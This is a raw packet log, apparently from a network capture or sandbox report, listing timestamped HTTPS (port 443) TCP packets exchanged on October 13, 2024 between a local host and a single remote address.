                                                                                                                          Oct 13, 2024 18:21:35.835937023 CEST49794443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:35.836030006 CEST49794443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:35.836049080 CEST4434979413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:35.836062908 CEST49794443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:35.836070061 CEST4434979413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:35.838805914 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:35.838841915 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:35.838975906 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:35.839121103 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:35.839134932 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.349359989 CEST4434979913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.349831104 CEST49799443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.349864006 CEST4434979913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.350233078 CEST49799443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.350240946 CEST4434979913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.370385885 CEST4434980013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.370820045 CEST49800443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.370839119 CEST4434980013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.371192932 CEST49800443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.371198893 CEST4434980013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.373923063 CEST4434980213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.374332905 CEST49802443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.374430895 CEST4434980213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.374558926 CEST49802443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.374573946 CEST4434980213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.381639957 CEST4434980113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.381930113 CEST49801443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.381962061 CEST4434980113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.382302046 CEST49801443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.382313967 CEST4434980113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.450158119 CEST4434979913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.450213909 CEST4434979913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.450253963 CEST49799443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.450438976 CEST49799443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.450464964 CEST4434979913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.450478077 CEST49799443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.450485945 CEST4434979913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.456262112 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.456352949 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.456430912 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.456532955 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.456542015 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.484477997 CEST4434980013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.484607935 CEST4434980013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.484658957 CEST49800443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.484781027 CEST49800443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.484798908 CEST4434980013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.484810114 CEST49800443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.484814882 CEST4434980013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.484839916 CEST4434980213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.484904051 CEST4434980213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.485078096 CEST49802443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.485249043 CEST4434980113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.485369921 CEST4434980113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.485445023 CEST49801443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.495708942 CEST49801443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.495709896 CEST49801443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.495755911 CEST4434980113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.495784044 CEST4434980113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.495809078 CEST49802443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.495810032 CEST49802443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.495825052 CEST4434980213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.495845079 CEST4434980213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.503022909 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.505856037 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.505909920 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.505970955 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.508158922 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.508200884 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.508265018 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.508641005 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.508660078 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.509228945 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.509233952 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.509406090 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.509426117 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.509545088 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.509604931 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.509673119 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.509677887 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.509695053 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.509936094 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.509949923 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.606487036 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.606641054 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.606710911 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.606833935 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.606842995 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.606853008 CEST49803443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.606858015 CEST4434980313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.612590075 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.612631083 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:36.612700939 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.615192890 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:36.615209103 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.151251078 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.151869059 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.151894093 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.152518988 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.152523994 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.163556099 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.164324999 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.164419889 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.164877892 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.164895058 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.186852932 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.193562031 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.193978071 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.194003105 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.194690943 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.194694996 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.195106030 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.195194960 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.195704937 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.195719957 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.255881071 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.255949974 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.256098986 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.257260084 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.257296085 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.257347107 CEST49804443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.257363081 CEST4434980413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.264704943 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.264759064 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.264866114 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.264990091 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.265001059 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.265134096 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.265167952 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.265254021 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.272241116 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.273144960 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.273173094 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.273911953 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.273921967 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.273924112 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.273974895 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.274008989 CEST49805443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.274027109 CEST4434980513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.277910948 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.277937889 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.278064013 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.278248072 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.278273106 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.295401096 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.295489073 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.297998905 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.297998905 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.298121929 CEST49807443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.298135996 CEST4434980713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.298352003 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.298487902 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.303482056 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.343477964 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.343477964 CEST49806443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.343569040 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.343604088 CEST4434980613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.355614901 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.355619907 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.355652094 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.355660915 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.355726957 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.355731010 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.355916023 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.355933905 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.358489990 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.358506918 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.373363018 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.373517990 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.373919010 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.373919010 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.374145985 CEST49808443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.374160051 CEST4434980813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.383703947 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.383754969 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.383982897 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.387712002 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.387728930 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.918688059 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.944427967 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.958141088 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:37.992750883 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.014995098 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.041990995 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.047903061 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.056404114 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.086699009 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.097387075 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.178234100 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.178276062 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.178929090 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.178941965 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.179254055 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.179281950 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.179713011 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.179719925 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.180083990 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.180109978 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.180130959 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.180145025 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.180483103 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.180488110 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.180587053 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.180593014 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.180811882 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.180826902 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.181159973 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.181165934 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.277546883 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.277729034 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.277895927 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.277895927 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.277932882 CEST49809443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.277950048 CEST4434980913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.278966904 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.279113054 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.279170990 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.279259920 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.279283047 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.279299974 CEST49813443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.279306889 CEST4434981313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.279581070 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.279829025 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.279910088 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.280703068 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.280720949 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.280735016 CEST49810443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.280740023 CEST4434981013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.281805038 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.281955004 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.282011986 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.282043934 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.282110929 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.282169104 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.284744024 CEST49815443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.284811974 CEST4434981513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.284888029 CEST49815443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.286092997 CEST49816443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.286137104 CEST4434981613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.286194086 CEST49816443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.286885023 CEST49816443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.286905050 CEST4434981613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.286967993 CEST49815443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.286998987 CEST4434981513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.287126064 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.287143946 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.287177086 CEST49811443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.287184954 CEST4434981113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.288428068 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.288428068 CEST49812443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.288455009 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.288491011 CEST4434981213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.290287971 CEST49817443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.290321112 CEST4434981713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.290375948 CEST49817443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.290894985 CEST49817443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.290909052 CEST4434981713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.292021990 CEST49818443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.292028904 CEST4434981813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.292097092 CEST49818443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.292229891 CEST49819443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.292243958 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.292303085 CEST49819443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.292361975 CEST49818443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.292373896 CEST4434981813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:38.292457104 CEST49819443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:38.292473078 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.082834959 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.088809013 CEST49819443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.088870049 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.089750051 CEST49819443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.089761972 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.092375040 CEST4434981713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.092931032 CEST49817443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.092973948 CEST4434981713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.095238924 CEST4434981613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.096488953 CEST4434981813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.097099066 CEST4434981513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.101932049 CEST49817443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.101938963 CEST4434981713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.104259014 CEST49815443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.104326963 CEST4434981513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.104944944 CEST49815443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.104958057 CEST4434981513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.105542898 CEST49816443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.105575085 CEST4434981613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.106180906 CEST49816443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.106189966 CEST4434981613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.106472015 CEST49818443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.106486082 CEST4434981813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.107003927 CEST49818443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.107007027 CEST4434981813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.187977076 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.188112974 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.188190937 CEST49819443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.198892117 CEST49819443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.198913097 CEST4434981913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.203625917 CEST4434981513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.203783035 CEST4434981513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.203938961 CEST49815443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.204265118 CEST4434981713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.204307079 CEST4434981613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.204339027 CEST4434981713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.204401016 CEST49817443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.204463959 CEST4434981613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.204519987 CEST49816443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:39.209924936 CEST4434981813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.210074902 CEST4434981813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.210155010 CEST49818443192.168.2.413.107.246.60
